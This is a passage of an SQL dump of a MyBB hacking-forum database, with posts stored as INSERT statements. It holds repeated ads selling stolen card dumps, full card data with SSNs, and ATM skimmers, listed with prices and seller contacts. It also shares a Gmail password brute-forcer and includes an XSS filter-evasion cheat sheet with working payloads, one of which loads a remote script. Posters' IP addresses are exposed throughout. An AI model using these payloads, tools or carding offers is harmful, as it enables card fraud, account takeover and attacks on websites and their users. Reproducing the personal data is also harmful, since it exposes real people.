'6234fbeb5af0418d8f03a6660f803810', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('198', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '20', 'JakeUS', '1344300547', 'What is dota 2?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'a20903c99309c0147c8da1c7125b863c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('199', '84', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344312979', 'Track1&2 Fullz and Atm Skimmer. USA BANKLOGIN CANADA LOGINS UK LOGINS US CVV UK CVV EU CVV FULL CC with mmn,ssn,dob,pin = pm me for price US Dumps: Canada Dumps: Europe Dumps: Asia Dumps Atm Skimmer Wincor Nixdorf = 3000 Atm Skimmer Wincor = 3000 Atm Skimmer Slimm = 3000 Atm Skimmer Slim = 3000 Atm Skimmer NCR = 3000 Atm Skimmer Diebold Opteva = 2500 Atm Skimmer Diebold = 2000 Atm Skimmer Universal = 4000 Atm Skimmer Small = 2500 Chip POS ingenico&amigo = 1500 MSR206 MSE ETC PRINTED TRACKS ON PLASTIC WITH PIN FOR SALE YIM : mr.ham69@yahoo.com ICQ : 577044037 email me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '6411c7f386e20705eb6f685c260d7586', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('200', '85', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313194', 'Track1&2 Fullz and Atm Skimmer. USA BANKLOGIN CANADA LOGINS UK LOGINS US CVV UK CVV EU CVV FULL CC with mmn,ssn,dob,pin = pm me for price US Dumps: Canada Dumps: Europe Dumps: Asia Dumps Atm Skimmer Wincor Nixdorf = 3000 Atm Skimmer Wincor = 3000 Atm Skimmer Slimm = 3000 Atm Skimmer Slim = 3000 Atm Skimmer NCR = 3000 Atm Skimmer Diebold Opteva = 2500 Atm Skimmer Diebold = 2000 Atm Skimmer Universal = 4000 Atm Skimmer Small = 2500 Chip POS ingenico&amigo = 1500 MSR206 MSE ETC PRINTED TRACKS ON PLASTIC WITH PIN FOR SALE YIM : mr.ham69@yahoo.com ICQ : 577044037 email me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '5c04786084baac6b6d8475515d2cfa7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('201', '86', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313620', 'Track1&2 Fullz and Atm Skimmer. USA BANKLOGIN CANADA LOGINS UK LOGINS US CVV UK CVV EU CVV FULL CC with mmn,ssn,dob,pin = pm me for price US Dumps: Canada Dumps: Europe Dumps: Asia Dumps Atm Skimmer Wincor Nixdorf = 3000 Atm Skimmer Wincor = 3000 Atm Skimmer Slimm = 3000 Atm Skimmer Slim = 3000 Atm Skimmer NCR = 3000 Atm Skimmer Diebold Opteva = 2500 Atm Skimmer Diebold = 2000 Atm Skimmer Universal = 4000 Atm Skimmer Small = 2500 Chip POS ingenico&amigo = 1500 MSR206 MSE ETC PRINTED TRACKS ON PLASTIC WITH PIN FOR SALE YIM : mr.ham69@yahoo.com ICQ : 577044037 email me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '983ed48c6de9ffe2f2d4d4984ae7f2fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('202', '87', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313725', 'Track1&2 Fullz and Atm Skimmer. USA BANKLOGIN CANADA LOGINS UK LOGINS US CVV UK CVV EU CVV FULL CC with mmn,ssn,dob,pin = pm me for price US Dumps: Canada Dumps: Europe Dumps: Asia Dumps Atm Skimmer Wincor Nixdorf = 3000 Atm Skimmer Wincor = 3000 Atm Skimmer Slimm = 3000 Atm Skimmer Slim = 3000 Atm Skimmer NCR = 3000 Atm Skimmer Diebold Opteva = 2500 Atm Skimmer Diebold = 2000 Atm Skimmer Universal = 4000 Atm Skimmer Small = 2500 Chip POS ingenico&amigo = 1500 MSR206 MSE ETC PRINTED TRACKS ON PLASTIC WITH PIN FOR SALE YIM : mr.ham69@yahoo.com ICQ : 577044037 email me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '40f83ab7f727bfe139b739e92652a327', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('203', '88', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313895', 'Track1&2 Fullz and Atm Skimmer. USA BANKLOGIN CANADA LOGINS UK LOGINS US CVV UK CVV EU CVV FULL CC with mmn,ssn,dob,pin = pm me for price US Dumps: Canada Dumps: Europe Dumps: Asia Dumps Atm Skimmer Wincor Nixdorf = 3000 Atm Skimmer Wincor = 3000 Atm Skimmer Slimm = 3000 Atm Skimmer Slim = 3000 Atm Skimmer NCR = 3000 Atm Skimmer Diebold Opteva = 2500 Atm Skimmer Diebold = 2000 Atm Skimmer Universal = 4000 Atm Skimmer Small = 2500 Chip POS ingenico&amigo = 1500 MSR206 MSE ETC PRINTED TRACKS ON PLASTIC WITH PIN FOR SALE YIM : mr.ham69@yahoo.com ICQ : 577044037 email me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '6fc502e6a5619217c8aa564c005845e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('204', '89', '0', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '6', 'mr.ham69', '1344313990', 'Track1&2 Fullz and Atm Skimmer. USA BANKLOGIN CANADA LOGINS UK LOGINS US CVV UK CVV EU CVV FULL CC with mmn,ssn,dob,pin = pm me for price US Dumps: Canada Dumps: Europe Dumps: Asia Dumps Atm Skimmer Wincor Nixdorf = 3000 Atm Skimmer Wincor = 3000 Atm Skimmer Slimm = 3000 Atm Skimmer Slim = 3000 Atm Skimmer NCR = 3000 Atm Skimmer Diebold Opteva = 2500 Atm Skimmer Diebold = 2000 Atm Skimmer Universal = 4000 Atm Skimmer Small = 2500 Chip POS ingenico&amigo = 1500 MSR206 MSE ETC PRINTED TRACKS ON PLASTIC WITH PIN FOR SALE YIM : mr.ham69@yahoo.com ICQ : 577044037 email me for bulk and more purchase mr.ham69@yahoo.com', '41.218.247.11', '702215947', '0', '0', '0', '0', '1', '52a633a8b3070e4757f204f133498f07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('205', '84', '199', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356245', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('206', '85', '200', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356262', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('207', '86', '201', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356274', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('208', '87', '202', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356288', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('209', '88', '203', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356299', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('210', '89', '204', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '20', 'JakeUS', '1344356309', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('211', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '1', 't3h jok3r', '1344371531', 'I also had the same question.', '41.174.60.196', '699284676', '1', '0', '0', '0', '1', 'c38d0cde2b4f3b231a87cb0cde91cc77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('212', '57', '141', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '12', 'jonas83', '1344371862', 'No problem, I try being active and try to make L33t hacking full with great contributions.', '41.174.60.196', '699284676', '0', '0', '0', '0', '1', '25cfde2b9536fbf4e013b7df6052c8a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('213', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '12', 'jonas83', '1344371941', 'Thanks and I didn\'t know that cnet allowed programs such as VPNs.', '41.174.60.196', '699284676', '0', '0', '0', '0', '1', 'fa1cc106e246006358ed2f8b8b4e74f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('214', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '19', 'yazz', '1344372356', 'He posted it in the right section. This is the right places for programs.', '41.174.60.196', '699284676', '0', '0', '0', '0', '1', '666edd7df61066abea4808fcf07b1f04', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('215', '90', '0', '24', '[tut]How to really hide your data from the cops', '0', '1', 't3h jok3r', '1344372996', 'The video title and description make it sound like the tutorial is just about truecrypt, but its more than that. This video will show you how to hide your information from the police and never get caught. http://www.securitytube.net/Encrypting-y...video.aspx Any feedback would be great! Enjoy.', '41.174.60.196', '699284676', '1', '0', '0', '0', '1', '91a73189aa68451e753122a0b9c26d98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('216', '90', '215', '24', 'RE: [tut]How to really hide your data from the cops', '0', '2', 'Apathy', '1344398722', 'Nice share thanks joker.', '65.93.79.28', '1096634140', '0', '0', '0', '0', '1', '821f40800af4b4020f7dc3477ead98da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('217', '83', '196', '34', 'RE: [tut]How to make a thread design', '0', '2', 'Apathy', '1344398799', 'Fresh tutorial/share thanks.', '65.93.79.28', '1096634140', '0', '0', '0', '0', '1', 'e7b02713d1bb66940bd79b1057f4b238', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('218', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '2', 'Apathy', '1344399019', 'Lololol this was a interesting read.', '65.93.79.28', '1096634140', '0', '0', '0', '0', '1', '2babf5cf36803b6aa0bca2ca7aced1e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('219', '91', '0', '42', 'Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '1', 't3h jok3r', '1344452361', '[img]http://l2.yimg.com/bt/api/res/1.2/FH_9AMRtgCOqV.sSBuOgdg--/YXBwaWQ9eW5ld3M7cT04NTt3PTYzMA--/http://media.zenfs.com/en/blogs/sptusolyexperts/asfaaaaa.jpg[/img] South African gold medalist Cameron van der Burgh admitted to taking extra underwater kicks during his world-record performance in the 100-meter breaststroke at the Olympics, an illegal move that would have earned him a disqualification if judges had caught him. Swimmers are allowed one underwater [b]dolphin kick during their underwater[/b] breaststroke pullouts. Replays show van der Burgh took three on the start.', '41.174.9.29', '699271453', '1', '0', '0', '0', '1', 'db3ec1b63818e36fbfd51a88885514a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('220', '92', '0', '15', '[FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '9', 'p420', '1344454979', '[img]http://dl.dropbox.com/u/9005148/RhinoTube/logo.png[/img] [color=#00BFFF][b]Screenshot(s):[/b][/color] [img]http://dl.dropbox.com/u/9005148/RhinoTube/2.png[/img] [img]http://dl.dropbox.com/u/9005148/RhinoTube/3.png[/img] [img]http://dl.dropbox.com/u/9005148/RhinoTube/4.png[/img] [img]http://dl.dropbox.com/u/9005148/RhinoTube/5.png[/img] [color=#00BFFF][b]Features:[/b][/color] -Free Online Account List (250+ accounts) -Rate (Like / Dislike) -Comment -Account Checker -Use Proxy List (Hasn\'t really been tested because I don\'t have a working proxy list, but if someone could give me a working one to test with I\'d appreciate it! I do not suggest using this function) [color=#00BFFF][b]Known Bugs:[/b][/color] -If the account doesn\'t have a valid email, the bot will stop (will be fixed when subscribe is added. [color=#00BFFF][b]Virus Scan:[/b][/color] http://www.virustotal.com/file-scan/report.html?id=90b0a0cdcdd9bde458b9d9d22846df56ae4e365587e3598f918203cf602e7206-1284745112 [color=#00BFFF][b]Download:[/b][/color] [lock]http://hotfile.com/dl/126293841/4c82cac/RhinoTubePremiumBeta_ubers.org.zip.html[/lock] Password for archive: [code]www.ubers.org[/code] Credits: ubers.org', '41.174.9.29', '699271453', '0', '0', '1', '1352012003', '1', '8b6175463e2fc19f907d1d96b14348a4', '0', '1352012003'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('221', '93', '0', '18', 'Gmail Brute Forcer Tool', '0', '9', 'p420', '1344455840', '[color=#FF0000][size=large]Hello L33T Hacking.Today i\'ll give you an password bruteforce tool,it\'s for Gmail.[/size][/color] [color=#A9A9A9][size=medium]Some info about the tool:[/size][/color] -Tool is a bit slow but it does the job successfully,off course if password is in the list. -Don\'t delete or rename dis.txt file because it\'s default file for password list.If did program won\'t work. -I found an big password list,it\'s included in download. -If you want to add more passwords in dis.txt it must be in the following format: password|password|password etc. [color=#FFD700][size=medium]Download:[/size][/color] [url=http://adf.ly/BTT8z][color=#0000CD]HERE[/color][/url] [color=#FFD700][size=medium]Virus Scan:[/size][/color] .rar file [url=http://vscan.novirusthanks.org/file/07fa5d36f52f40f9d5ae35311d83ca02/Z21haWwtYnJ1dGUtcmFy/][color=#0000CD]HERE[/color][/url] .exe file [url=http://vscan.novirusthanks.org/file/0aac1805076d4441f0ff6522738f5293/Z21haWxoYWNrZXItZXhl/][color=#0000CD]HERE[/color][/url] [color=#FFD700][size=medium]Proof:[/size][/color] [video=youtube]http://www.youtube.com/watch?v=g6S7riznKP4[/video] Enjoy', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '6ca1c710f2b02a09ab1235bdbcb9ca0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('222', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '9', 'p420', '1344456003', 'Works like a charm, thanks for this voice changer.', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '5ed92d5d2f56845332b6f5d415f96b76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('223', '94', '0', '16', 'What is this section about?', '0', '9', 'p420', '1344456185', '[align=center][size=xx-large][font=Tahoma][u][b][color=#32CD32]What Is The Social Engineering Section?[/color][/b][/u][/font][/size][/align] Well my friends, let me enlighten you. The art of [b]Social Engineering[/b] can be getting free items out of businesses or successfully lying to someone and everything in between. [b]Social Engineering[/b] is commonly understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims. \"[b]Social Engineering[/b]\" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals. [b]Social Engineering[/b] in political science refers to efforts that influence popular attitudes and social behaviors on a large scale, whether by governments or private groups. In the political arena, the counterpart of [b]Social Engineering[/b] is political engineering. For various reasons, the term has been imbued with negative connotations. However, virtually all law and governance has the effect of seeking to change behavior and could be considered \"[b]Social Engineering[/b]\" to some extent. Prohibitions on murder, rape, suicide and littering are all policies aimed at discouraging undesirable behaviors. In British and Canadian jurisprudence, changing public attitudes about a behaviour is accepted as one of the key functions of laws prohibiting it. Governments also influence behavior more subtly through incentives and disincentives built into economic policy and tax policy, for instance, and have done so for centuries. In practice, some (perhaps mainly on the left) would argue, whether any specific policy is labeled as \"[b]Social Engineering[/b]\" could be considered a question of intent; others (perhaps mainly on the right) would also argue it to be a question of scale and pace. The term is most often used by, on the one hand libertarians and free-market thinkers, and, on the other, social and cultural traditionalists as a criticism of those who propose to use law, tax policy, or other kinds of state influence to attempt to modify or altogether transform existing social mores or power relationships (actual or perceived): for instance, between men and women, or between different ethnic groups. Political conservatives in the United States have accused their opponents of [b]Social Engineering[/b] through the promotion of political correctness, insofar as it may change social attitudes by defining \"acceptable\" and \"unacceptable\" language or acts, and through such programs as the banning of prayers at public events. Political liberals in the United States have accused their opponents of [b]Social Engineering[/b] through the promotion of abstinence-only sex education, the English-only movement, sodomy laws and state sponsored school prayer. Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures. A social engineer runs what used to be called a \"con game.\" For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network\'s security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques. Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, and scareware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst. Another aspect of social engineering relies on people\'s inability to keep up with a culture that relies heavily on information technology. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. Frequently, social engineers will search dumpzters for valuable information, memorize access codes by looking over someone\'s shoulder (shoulder surfing), or take advantage of people\'s natural inclination to choose passwords that are meaningful to them but can be easily guessed. Security experts propose that as our culture becomes more dependent on information, social engineering will remain the greatest threat to any security system. Prevention includes educating people about the value of information, training them to protect it, and increasing people\'s awareness of how social engineers operate.', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', '3ee24e310477daffb6ef26889059a4e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('224', '82', '193', '13', 'RE: [guide]How to detect Hash Type', '0', '7', 'Romdu62', '1344456396', 'Sound come in handy. Nice decrypting sites.', '41.174.9.29', '699271453', '0', '0', '0', '0', '1', 'b9c7b3f14831c3f7268d3560c15b245c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('225', '95', '0', '13', 'XSS Cheat Sheet', '0', '7', 'Romdu62', '1344456827', 'XSS locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word \"XSS\" will pop up. Use the URL encoding calculator below to encode the entire string. Tip: if you\'re in a rush and need to quickly check a page, often times injecting the depreciated \"\" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably: [code]\';alert(String.fromCharCode(88,83,83))//\\[/code] XSS locator 2. If you don\'t have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses &lt;XSS to see if it is vulnerable: [code]\'\';!--\"<XSS>=&{()}[/code] No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here): [code]<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>[/code] Image XSS using the JavaScript directive (IE7.0 doesn\'t support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well - I\'ll probably revise this at a later date): [code]<IMG SRC=\"javascript:alert(\'XSS\');\">[/code] No quotes and no semicolon: [code]<IMG SRC=javascript:alert(\'XSS\')>[/code] Case insensitive XSS attack vector: [code]<IMG SRC=JaVaScRiPt:alert(\'XSS\')>[/code] HTML entities (the semicolons are required for this to work): [code]<IMG SRC=javascript:alert(&quot;XSS&quot;)>[/code] Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don\'t know about grave accents): [code]<IMG SRC=`javascript:alert(\"RSnake says, \'XSS\'\")`>[/code] Malformed IMG tags. Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag: [code]<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">[/code] fromCharCode (if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need). Click here to build your own (thanks to Hannes Leopold): [code]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>[/code] UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS calculator for more information: [code]<IMG SRC=javascript:alert(\'XSS\')>[/code] Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for \"&#XX;\", since most people don\'t know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\\&#(\\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I\'ve seen this in the wild): [code]<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>[/code] Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string =~ s/.*\\&#(\\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). Use the XSS calculator for more information: [code]<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>[/code] Embedded tab to break up the cross site scripting attack: [code]<IMG SRC=\"jav ascript:alert(\'XSS\');\">[/code] Embedded encoded tab to break up XSS: [code]<IMG SRC=\"jav&#x09;ascript:alert(\'XSS\');\">[/code] Embeded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector: [code]<IMG SRC=\"jav&#x0A;ascript:alert(\'XSS\');\">[/code] Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I\'ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.): [code]<IMG SRC=\"jav&#x0D;ascript:alert(\'XSS\');\">[/code] Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector) these are not spaces just one of the three characters as described above: [code]<IMG SRC = \" j a v a s c r i p t : a l e r t ( \' X S S \' ) \" > [/code] Null breaks up JavaScript directive. Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example: [code]perl -e \'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out[/code] Null breaks up 